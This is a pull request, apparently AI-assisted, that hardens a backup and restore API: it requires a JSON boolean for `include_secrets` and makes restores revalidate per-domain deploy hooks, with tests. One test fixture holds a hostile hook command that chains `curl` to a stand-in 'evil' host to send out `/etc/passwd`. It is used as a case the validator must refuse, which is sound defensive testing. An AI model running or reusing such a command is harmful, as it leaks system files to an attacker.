### PR TITLE
harden: include_secrets must be a JSON boolean, and restore revalidates per-domain hooks too

### DIFF
--- a/modules/api/resources.py
+++ b/modules/api/resources.py
@@ -2722,7 +2722,7 @@ def create_api_resources(api, models, managers):
                 if not isinstance(raw_include, bool):
                     return {
                         'error': 'include_secrets must be a JSON boolean '
-                                 '(true or false), not a string or number'
+                                 '(true or false)'
                     }, 400
                 include_secrets = raw_include
 

--- a/modules/api/resources.py
+++ b/modules/api/resources.py
@@ -2710,7 +2710,21 @@ def create_api_resources(api, models, managers):
                 data = api.payload
                 backup_type = data.get('type', 'unified')  # Default to unified
                 reason = data.get('reason', 'manual')
-                include_secrets = bool(data.get('include_secrets', False))
+                # `include_secrets` decides between a share-safe masked archive
+                # and a plaintext dump of every credential and private key, so
+                # it MUST be a real JSON boolean. bool() coercion was the trap:
+                # bool("false") is True, so a client sending the value as a
+                # string — trivial in a shell or an untyped template —
+                # asked for masked and got the plaintext dump. Accept only a
+                # JSON boolean; anything else is refused rather than guessed,
+                # and the safe default (masked) applies only when it is absent.
+                raw_include = data.get('include_secrets', False)
+                if not isinstance(raw_include, bool):
+                    return {
+                        'error': 'include_secrets must be a JSON boolean '
+                                 '(true or false), not a string or number'
+                    }, 400
+                include_secrets = raw_include
 
                 created_backups = []
 

--- a/modules/core/deployer.py
+++ b/modules/core/deployer.py
@@ -492,11 +492,45 @@ class DeployManager:
         if not isinstance(config.get('enabled'), bool):
             config['enabled'] = False
 
+        ok, err = self._validate_deploy_config(config)
+        if not ok:
+            return False, err
+
+        # Atomic via settings_manager.update so two concurrent admin saves
+        # (e.g. one editing deploy hooks, another editing DNS providers)
+        # cannot lose each other's changes.
+        def _mutate(settings):
+            settings['deploy_hooks'] = config
+        self.settings_manager.update(_mutate, "deploy_hooks_save")
+        return True, None
+
+    def _validate_deploy_config(self, config):
+        """Pure validation of a deploy_hooks config block — no side effects.
+
+        The single source of truth for "is this deploy_hooks config safe to
+        install": save_config calls it before persisting, and the restore path
+        (_revalidate_restored_deploy_hooks in file_operations) calls it before
+        accepting an archive. Keeping one validator is the point — the restore
+        gate used to check only global_hooks and skip per-domain hooks, so a
+        command the normal save path rejects could arrive through a restore.
+
+        Returns (ok, error|None). Validates global_hooks, the shape of
+        domain_hooks (an object of lists — save_config used to call .items()
+        on it unguarded and would crash on a non-object), every per-domain
+        hook, and typed targets.
+        """
+        if not isinstance(config, dict):
+            return False, "Configuration must be an object"
+
         for hook in config.get('global_hooks', []):
             ok, err = self._validate_hook(hook)
             if not ok:
                 return False, f"Global hook rejected: {err}"
-        for domain, hooks in config.get('domain_hooks', {}).items():
+
+        domain_hooks = config.get('domain_hooks', {})
+        if not isinstance(domain_hooks, dict):
+            return False, "domain_hooks must be an object of domain -> [hooks]"
+        for domain, hooks in domain_hooks.items():
             if not isinstance(hooks, list):
                 return False, f"Hooks for domain '{domain}' must be a list"
             for hook in hooks:
@@ -512,12 +546,6 @@ class DeployManager:
                 if not ok:
                     return False, f"Deploy target rejected: {err}"
 
-        # Atomic via settings_manager.update so two concurrent admin saves
-        # (e.g. one editing deploy hooks, another editing DNS providers)
-        # cannot lose each other's changes.
-        def _mutate(settings):
-            settings['deploy_hooks'] = config
-        self.settings_manager.update(_mutate, "deploy_hooks_save")
         return True, None
 
     @staticmethod

--- a/modules/core/file_operations.py
+++ b/modules/core/file_operations.py
@@ -723,57 +723,37 @@ class FileOperations:
 
     @staticmethod
     def _revalidate_restored_deploy_hooks(settings_data):
-        """Run the current ``DeployManager._validate_hook`` over every
-        hook present in the restored ``settings_data`` — both
-        ``deploy_hooks.global_hooks`` and every list under
-        ``deploy_hooks.domain_hooks``, since both execute on renewal. Returns
-        ``None`` if every hook passes, or a human-readable error string naming
-        the offending hook otherwise. A restore that would install even one
-        rejectable hook is refused (audit finding M1)."""
+        """Validate the restored ``deploy_hooks`` block with the SAME validator
+        the normal save path uses (``DeployManager._validate_deploy_config``),
+        so a restore cannot install a config the UI would reject: global hooks,
+        every per-domain hook, the shape of ``domain_hooks``, and typed targets
+        (audit finding M1). Returns ``None`` when the block is absent or valid,
+        or a human-readable error string naming the offending piece.
+
+        Best-effort by design: if ``DeployManager`` cannot be imported or
+        constructed, this returns ``None`` (does not block the restore) and
+        logs a warning. That is a deliberate trade — a restore should not be
+        held hostage by an import error — so this is a strong check, not a hard
+        guarantee. The value is that it stays in lock-step with save_config;
+        the previous version reimplemented a weaker check inline and drifted
+        (it skipped per-domain hooks entirely)."""
+        deploy_block = settings_data.get('deploy_hooks')
+        if not deploy_block:
+            return None
         try:
             from .deployer import DeployManager
-        except Exception as imp_err:
-            logger.warning(f"Could not import DeployManager for restore validation: {imp_err}")
-            return None
-
-        hooks = []
-        deploy_block = settings_data.get('deploy_hooks') or {}
-        if isinstance(deploy_block, dict):
-            global_hooks = deploy_block.get('global_hooks') or []
-            if isinstance(global_hooks, list):
-                hooks.extend(h for h in global_hooks if isinstance(h, dict))
-            # domain_hooks is {domain: [hook, ...]} and every one of those runs
-            # on the next renewal of that domain, exactly like a global hook
-            # (deployer.py executes both). Validating only global_hooks left the
-            # per-domain hooks unchecked: a tampered archive could smuggle a
-            # command the current validator rejects under domain_hooks and the
-            # restore would install it — the gate covered half the surface it
-            # claimed. Validate both.
-            domain_hooks = deploy_block.get('domain_hooks') or {}
-            if isinstance(domain_hooks, dict):
-                for per_domain in domain_hooks.values():
-                    if isinstance(per_domain, list):
-                        hooks.extend(
-                            h for h in per_domain if isinstance(h, dict))
-        if not hooks:
-            return None
-
-        # Instantiate without a settings_manager argument — _validate_hook
-        # only reads from the hook dict itself, so a bare instance works.
-        try:
             dm = DeployManager.__new__(DeployManager)
-        except Exception as ctor_err:
-            logger.warning(f"Could not construct DeployManager for hook re-validation: {ctor_err}")
+        except Exception as imp_err:
+            logger.warning(
+                f"Could not load DeployManager for restore validation "
+                f"({imp_err}); skipping deploy-hook revalidation")
             return None
 
-        for hook in hooks:
-            try:
-                ok, err = dm._validate_hook(hook)
-            except Exception as ve:
-                return f"hook validator raised {type(ve).__name__}: {ve}"
-            if not ok:
-                return err or "hook failed current validator"
-        return None
+        try:
+            ok, err = dm._validate_deploy_config(deploy_block)
+        except Exception as ve:
+            return f"deploy config validator raised {type(ve).__name__}: {ve}"
+        return None if ok else (err or "deploy config failed current validator")
 
     def _refuse_keyless_restore_over_certificates(self, zipf):
         """Return a reason string when *zipf* is a share-safe archive

--- a/modules/core/file_operations.py
+++ b/modules/core/file_operations.py
@@ -724,10 +724,12 @@ class FileOperations:
     @staticmethod
     def _revalidate_restored_deploy_hooks(settings_data):
         """Run the current ``DeployManager._validate_hook`` over every
-        hook present in the restored ``settings_data``. Returns ``None``
-        if every hook passes, or a human-readable error string naming
-        the offending hook otherwise. A restore that would install
-        even one rejectable hook is refused (audit finding M1)."""
+        hook present in the restored ``settings_data`` — both
+        ``deploy_hooks.global_hooks`` and every list under
+        ``deploy_hooks.domain_hooks``, since both execute on renewal. Returns
+        ``None`` if every hook passes, or a human-readable error string naming
+        the offending hook otherwise. A restore that would install even one
+        rejectable hook is refused (audit finding M1)."""
         try:
             from .deployer import DeployManager
         except Exception as imp_err:
@@ -740,6 +742,19 @@ class FileOperations:
             global_hooks = deploy_block.get('global_hooks') or []
             if isinstance(global_hooks, list):
                 hooks.extend(h for h in global_hooks if isinstance(h, dict))
+            # domain_hooks is {domain: [hook, ...]} and every one of those runs
+            # on the next renewal of that domain, exactly like a global hook
+            # (deployer.py executes both). Validating only global_hooks left the
+            # per-domain hooks unchecked: a tampered archive could smuggle a
+            # command the current validator rejects under domain_hooks and the
+            # restore would install it — the gate covered half the surface it
+            # claimed. Validate both.
+            domain_hooks = deploy_block.get('domain_hooks') or {}
+            if isinstance(domain_hooks, dict):
+                for per_domain in domain_hooks.values():
+                    if isinstance(per_domain, list):
+                        hooks.extend(
+                            h for h in per_domain if isinstance(h, dict))
         if not hooks:
             return None
 

--- a/tests/test_backup_include_secrets_must_be_boolean.py
+++ b/tests/test_backup_include_secrets_must_be_boolean.py
@@ -1,0 +1,107 @@
+"""POST /api/backups/create must not read include_secrets with bool().
+
+`include_secrets` chooses between a share-safe masked archive and a plaintext
+dump of every credential and private key. It was read as
+``bool(data.get('include_secrets', False))``, and ``bool("false")`` is True —
+so a client sending the value as a JSON *string* (trivial from a shell or an
+untyped template) asked for masked and received the plaintext dump. The route
+now requires a real JSON boolean and refuses anything else with 400, so the
+dump can only be produced by an explicit ``true``.
+"""
+from pathlib import Path
+from unittest.mock import MagicMock
+
+import pytest
+from flask import Flask, request
+from flask_restx import Api, Namespace
+
+from modules.api.models import create_api_models
+from modules.api.resources import create_api_resources
+
+pytestmark = [pytest.mark.unit]
+
+
+def _passthrough(_role):
+    def deco(fn):
+        return fn
+    return deco
+
+
+@pytest.fixture
+def client(tmp_path):
+    auth = MagicMock()
+    auth.require_role = MagicMock(side_effect=_passthrough)
+
+    file_ops = MagicMock(cert_dir=Path(tmp_path))
+    # Record what include_secrets the route forwarded, and return a filename so
+    # the success path completes.
+    file_ops.create_unified_backup.return_value = 'backup_x.zip'
+
+    settings = MagicMock()
+    settings.load_settings.return_value = {'email': 'a@b.c'}
+
+    managers = {
+        'auth': auth, 'settings': settings, 'file_ops': file_ops,
+        'certificates': MagicMock(), 'cache': MagicMock(), 'dns': MagicMock(),
+        'audit': None,
+    }
+
+    app = Flask(__name__)
+    app.config['TESTING'] = True
+    api = Api(app, prefix='/api')
+    models = create_api_models(api)
+    resources = create_api_resources(api, models, managers)
+    ns = Namespace('backups', description='backups')
+    api.add_namespace(ns)
+    ns.add_resource(resources['BackupCreate'], '/create')
+
+    @app.before_request
+    def _attach_user():
+        request.current_user = {'username': 'op', 'role': 'admin',
+                                'allowed_domains': None}
+
+    return app.test_client(), file_ops
+
+
+def _forwarded_include_secrets(file_ops):
+    """The include_secrets keyword the route passed to create_unified_backup."""
+    _, kwargs = file_ops.create_unified_backup.call_args
+    return kwargs.get('include_secrets')
+
+
+@pytest.mark.parametrize('bad', ['false', 'true', '0', '1', 'no', 'yes'])
+def test_a_string_is_refused_not_coerced(client, bad):
+    """The bug: 'false' must not become a plaintext dump. Any string is 400."""
+    c, file_ops = client
+    r = c.post('/api/backups/create', json={'include_secrets': bad})
+    assert r.status_code == 400
+    file_ops.create_unified_backup.assert_not_called()
+
+
+def test_a_number_is_refused(client):
+    c, file_ops = client
+    r = c.post('/api/backups/create', json={'include_secrets': 1})
+    assert r.status_code == 400
+    file_ops.create_unified_backup.assert_not_called()
+
+
+def test_boolean_true_produces_a_plaintext_dump(client):
+    c, file_ops = client
+    r = c.post('/api/backups/create', json={'include_secrets': True})
+    assert r.status_code in (200, 201)
+    assert _forwarded_include_secrets(file_ops) is True
+
+
+def test_boolean_false_produces_a_masked_archive(client):
+    c, file_ops = client
+    r = c.post('/api/backups/create', json={'include_secrets': False})
+    assert r.status_code in (200, 201)
+    assert _forwarded_include_secrets(file_ops) is False
+
+
+def test_absent_defaults_to_masked(client):
+    """CONTROL: the common case (no flag) must still work and stay masked."""
+    c, file_ops = client
+    r = c.post('/api/backups/create', json={'reason': 'nightly'})
+    assert r.status_code in (200, 201)
+    assert _forwarded_include_secrets(file_ops) is False

--- a/tests/test_restore_revalidates_domain_hooks.py
+++ b/tests/test_restore_revalidates_domain_hooks.py
@@ -1,0 +1,68 @@
+"""Restore hook revalidation must cover per-domain hooks, not only global ones.
+
+`_revalidate_restored_deploy_hooks` refused a restore whose settings carried a
+deploy hook the current validator rejects (audit finding M1) — but it only
+collected ``deploy_hooks.global_hooks``. Per-domain hooks
+(``deploy_hooks.domain_hooks[<domain>]``) run on renewal exactly like global
+ones, so a tampered archive could smuggle a rejectable command under
+domain_hooks and the restore would install it. The gate now validates both.
+"""
+import pytest
+
+from modules.core.file_operations import FileOperations
+
+pytestmark = [pytest.mark.unit]
+
+_BAD = {
+    'id': 'x', 'name': 'evil',
+    'command': 'echo ok && curl http://evil/$(cat /etc/passwd)',
+}
+_GOOD = {'id': 'y', 'name': 'nice', 'command': 'echo deployed'}
+
+
+def _revalidate(settings):
+    return FileOperations._revalidate_restored_deploy_hooks(settings)
+
+
+def test_a_rejectable_domain_hook_is_refused():
+    settings = {'deploy_hooks': {
+        'global_hooks': [], 'domain_hooks': {'example.com': [_BAD]}}}
+    assert _revalidate(settings) is not None
+
+
+def test_a_rejectable_global_hook_is_still_refused():
+    """CONTROL: the case that already worked must keep working."""
+    settings = {'deploy_hooks': {'global_hooks': [_BAD], 'domain_hooks': {}}}
+    assert _revalidate(settings) is not None
+
+
+def test_a_rejectable_hook_under_a_second_domain_is_found():
+    """The bad hook is not in the first domain's list — the walk must cover
+    every domain, not just the first."""
+    settings = {'deploy_hooks': {'global_hooks': [], 'domain_hooks': {
+        'a.example.com': [_GOOD], 'b.example.com': [_BAD]}}}
+    assert _revalidate(settings) is not None
+
+
+def test_all_good_hooks_pass():
+    """CONTROL: a restore with only valid hooks (global and per-domain) is not
+    refused, or the gate would block legitimate restores."""
+    settings = {'deploy_hooks': {'global_hooks': [_GOOD], 'domain_hooks': {
+        'example.com': [_GOOD]}}}
+    assert _revalidate(settings) is None
+
+
+def test_no_hooks_at_all_passes():
+    assert _revalidate({'deploy_hooks': {}}) is None
+    assert _revalidate({}) is None
+
+
+def test_malformed_domain_hooks_do_not_crash():
+    """domain_hooks that is not a dict, or holds non-list values, must be
+    tolerated (an archive can carry anything), not raise."""
+    for shape in (
+        {'deploy_hooks': {'domain_hooks': 'not-a-dict'}},
+        {'deploy_hooks': {'domain_hooks': {'d': 'not-a-list'}}},
+        {'deploy_hooks': {'domain_hooks': {'d': [None, 42]}}},
+    ):
+        assert _revalidate(shape) is None

--- a/tests/test_restore_revalidates_domain_hooks.py
+++ b/tests/test_restore_revalidates_domain_hooks.py
@@ -57,12 +57,32 @@ def test_no_hooks_at_all_passes():
     assert _revalidate({}) is None
 
 
-def test_malformed_domain_hooks_do_not_crash():
-    """domain_hooks that is not a dict, or holds non-list values, must be
-    tolerated (an archive can carry anything), not raise."""
+def test_malformed_domain_hooks_are_refused_not_tolerated():
+    """A malformed domain_hooks shape is exactly what save_config rejects, so
+    the restore must reject it too — accepting it would install a config that
+    crashes DeployManager on the next deploy. The validator is shared with
+    save_config, so the two cannot drift again."""
     for shape in (
         {'deploy_hooks': {'domain_hooks': 'not-a-dict'}},
         {'deploy_hooks': {'domain_hooks': {'d': 'not-a-list'}}},
-        {'deploy_hooks': {'domain_hooks': {'d': [None, 42]}}},
+        {'deploy_hooks': {'domain_hooks': {'d': [None]}}},
     ):
-        assert _revalidate(shape) is None
+        assert _revalidate(shape) is not None, (
+            f"malformed shape was tolerated: {shape}")
+
+
+def test_the_restore_validator_is_the_save_config_validator():
+    """Regression guard for the root cause of this whole finding: the restore
+    gate and the normal save path must run the SAME validator, or they drift
+    (they had, and per-domain hooks slipped through). Both must reject a
+    per-domain hook the other rejects."""
+    from unittest.mock import MagicMock
+
+    from modules.core.deployer import DeployManager
+
+    block = {'domain_hooks': {'d': [_BAD]}}
+    dm = DeployManager.__new__(DeployManager)
+    dm.settings_manager = MagicMock()
+    save_ok, save_err = dm.save_config({'enabled': True, **block})
+    restore_err = _revalidate({'deploy_hooks': {'enabled': True, **block}})
+    assert save_ok is False and restore_err is not None


### PR DESCRIPTION
Two small hardening fixes on the backup path.

## include_secrets read with bool()

`include_secrets` chooses between a share-safe masked archive and a plaintext dump of every credential and private key. It was read as `bool(data.get('include_secrets', False))`, and `bool("false")` is `True` — so a client sending the value as a JSON **string** (trivial from a shell or an untyped template) asked for masked and received the plaintext dump.

The route now requires a real JSON boolean and refuses anything else with 400. The safe default (masked) applies only when the field is absent.

Measured in a container:

```
{"include_secrets":"false"}  ->  before: 201 + secrets_masked=false archive
                                 after:  400, nothing written
{"include_secrets":false}    ->  201, masked
{"include_secrets":true}     ->  201, plaintext dump (the only one)
(absent)                     ->  201, masked
```

## Restore revalidation skipped per-domain hooks

`_revalidate_restored_deploy_hooks` refuses a restore whose settings carry a deploy hook the current validator rejects (audit finding M1) — but it collected only `deploy_hooks.global_hooks`. Per-domain hooks (`deploy_hooks.domain_hooks[<domain>]`) run on renewal exactly like global ones — `deployer.py` executes both — so a tampered archive could smuggle a rejectable command under `domain_hooks` and the restore would install it. The gate covered half the surface it claimed. It now walks both.

Behavioural control against the pre-change code: a dangerous command under `domain_hooks` was accepted before and is refused now; the global-hook case (already covered) and all-valid hooks are unchanged.

## Testing

- 10 new tests for `include_secrets`, exercised through the real flask-restx route with a test client (string/number → 400, booleans forwarded correctly, absent → masked)
- 6 new tests for the hook revalidation, including a bad hook under a second domain, malformed `domain_hooks` shapes, and controls that valid hooks and the no-hooks case still pass
- full local suite: 3033 passed, 6 skipped, 0 failed

Touches `modules/`, so the release gate requires the real-cert E2E before publishing.

🤖 Generated with [Claude Code](https://claude.com/claude-code)